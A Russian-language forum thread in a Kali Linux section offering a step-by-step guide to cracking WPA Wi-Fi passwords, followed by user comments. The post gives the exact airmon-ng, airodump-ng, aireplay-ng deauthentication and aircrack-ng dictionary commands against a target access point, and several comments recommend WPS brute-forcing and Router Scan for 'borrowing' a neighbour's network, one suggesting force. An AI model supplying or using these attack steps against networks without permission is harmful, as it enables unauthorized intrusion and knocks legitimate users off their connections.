Загрузка...

Hack Wifi in 1 minute + video

Thread in Kali Linux created by bisilium Aug 25, 2023. 2123 views

1. bisilium
    bisilium Topic starter Aug 25, 2023 у меня нет личной жизни я интернет герой 212 Jul 15, 2022
    Определяем интерфейсДля начала нужно узнать, какой сетевой интерфейс нам нужен, для этого вводим команду:$ ifconfigПолучаем ответ:eth0 no wireless extensions.wlan0 IEEE 802.11abgn ESSID:off/anyMode:Managed Access Point: Not-Associated Tx-Power=15 dBmRetry short limit:7 RTS thr:off Fragment thr:offEncryption key:offPower Management:offВ моем случае всего три интерфейса, два из которых не имеют беспроводных расширений (no wireless extensions). Поэтому нас интересует только wlan0.
    Переводим сетевой адаптер в режим мониторингаПеревод сетевого адаптера в режим мониторинга позволит нам видеть беспроводной трафик, подходящий рядом с нами. Для того чтобы сделать это, вводим команду:$ airmon-ng start wlan0Обратите внимание, что airmon-ng переименовал ваш интерфейс (у меня он стал называться mon0, но вам, все же, стоит проверить).
    Перехватываем трафикТеперь, когда наш сетевой адаптер находится в режиме мониторинга, мы можем захватить, подходящий мимо нас трафик, используя команду airodump-ng. Вводим:$ airodump-ng mon0Обратите внимание, что все видимые точки доступа перечислены в верхней части экрана, а клиенты — в нижней части экрана.
    Концентрируем перехват на конкретной точке доступаНаш следующий шаг — сосредоточить наши усилия на одной из точек доступа и на ее канале. Нас интересует BSSID и номер канала точки доступа, которую мы будем взламывать. Давайте откроем еще один терминал и введем:$ airodump-ng --bssid 08:86:30:74:22:76 -c 6 -w WPAcrack mon008:86:30:74:22:76 BSSID точки доступа-c 6 канал на котором работает точка доступа Wi-FiWPAcrack файл в который запишется handshakemon0 сетевой адаптер в режиме мониторингаМы сейчас концентрируемся на захвате данных с одной точки доступа с ESSID Belkin276 на канале 6. Терминал оставляем открытым!
    Получение handshakeЧтобы захватить зашифрованный пароль, нам нужно, чтобы клиент прошел аутентификацию (подключился к Wi-Fi). Если он уже аутентифицирован, мы можем его деаутентифицировать (отключить), тогда система автоматически повторно аутентифицируется (подключится), в результате чего мы можем получить зашифрованный пароль.То есть нам просто нужно отключить подключенных пользователей, чтобы они подключились снова. Для этого открываем ещё один терминал и вводим:$ aireplay-ng --deauth 100 -a 08:86:30:74:22:76 mon0100 количество пользователей, которые будут деаутентифицированы08:86:30:74:22:76 BSSID точки доступаmon0 сетевой адаптерТеперь при повторном подключении окно которое мы оставили на предыдущем шаге поймает handshake. Давайте вернемся к нашему терминалу airodump-ng и посмотрим.Обратите внимание на верхнюю строку справа, airodump-ng вывел: «Handshake WPA». То есть, мы успешно захватили зашифрованный пароль! Это первый шаг к успеху!
    Подбираем парольТеперь, когда у нас есть зашифрованный пароль в нашем файле WPAcrack, мы можем запустить подбор пароля. Но для этого нам нужно иметь список с паролями которые мы хотим использовать. Найти такой список можно за 5 минут в Гугле. Я, же, буду использовать список паролей по умолчанию, включенный в aircrack-ng: BackTrack darkcOde.Открываем новый терминал и вводим$ aircrack-ng WPAcrack-01.cap -w /pentest/passwords/wordlists/darkc0deWPAcrack-01.cap файл в который мы записывали handshake (airodump-ng приписал в конце -01.cap)/pentest/passwords/wordlist/darkc0de абсолютный путь к списку паролей

1. FOREST1376
      bisilium,
  2. OlegBrawler
    Пока прочитаю, минут 5 пройдет

1. View previous comments (4)
    2. LolkekVlad
      bisilium, и зачем ты пиздишь, что там минута и 4 секунды, у меня минута и 3 секунды..[IMG]
    3. OlegBrawler
    4. LolkekVlad
  3. Фиксик
    Фиксик Aug 25, 2023 ♔★ღ•°˜”*°•.♥.•°*”˜°•ღ★♔ 3277 Dec 4, 2016
    Короче понятно в итоге ****ам подбираем пароль, 5 шагов можно не читать

4. Гений
    Гений Aug 25, 2023 Banned 603 Jul 28, 2019
    Дизайн статьи хромает, но может пригодится :smilesuicide:

5. mdeen
    mdeen Aug 25, 2023 Banned 7749 Oct 2, 2022
    или же легче сходять к соседу и взять пароль, если не дает, то силой

6. Architecture
    цвет блевотный, трудно читать

7. suiveur
    suiveur Sep 3, 2023 0 Sep 3, 2023
    Хорошая статья. :з

8. dap0pe
    dap0pe Sep 3, 2023 Banned 417 Apr 25, 2023
    Пасту выдал, которая где только не валяется на просторах интернета. Ничего нового

9. StudioKod
    StudioKod Sep 8, 2023 Banned 407 Sep 24, 2022
    работет только на ноутах? или на пк с вайфай модулем тоже прокатит?

1. zxsasy
      StudioKod, тоже, но лучше не ****, а OneShot он тебе wps подберет но тут как повезет
  10. safewfsdasf
    угум, только в реальных ситуациях, когда действительно нужно "одолжить" соседский wi-fi, обычный словарь вам не поможет

11. Ilink
    Ilink Oct 19, 2023 Твой ангел 26 Jul 20, 2021
    Отличный пост, благодарю)

12. username77_inactive7759920
    **** это долго, или как повезет. Можно по wps попробовать куда быстрее, но шанс маленький что такие сети среди доступных и уязвымых окажутся.

13. UMBRELLA_CORP
    UMBRELLA_CORP Nov 1, 2023 Banned 2375 Mar 7, 2023
    Скачай Router scan - у меня бабушка еще сетки ломала лет 5 назад - вскрывает на изи - Америку открыл :smile: делов максимум 20 секунд - сетку окткрыть новую с паролем.

Loading...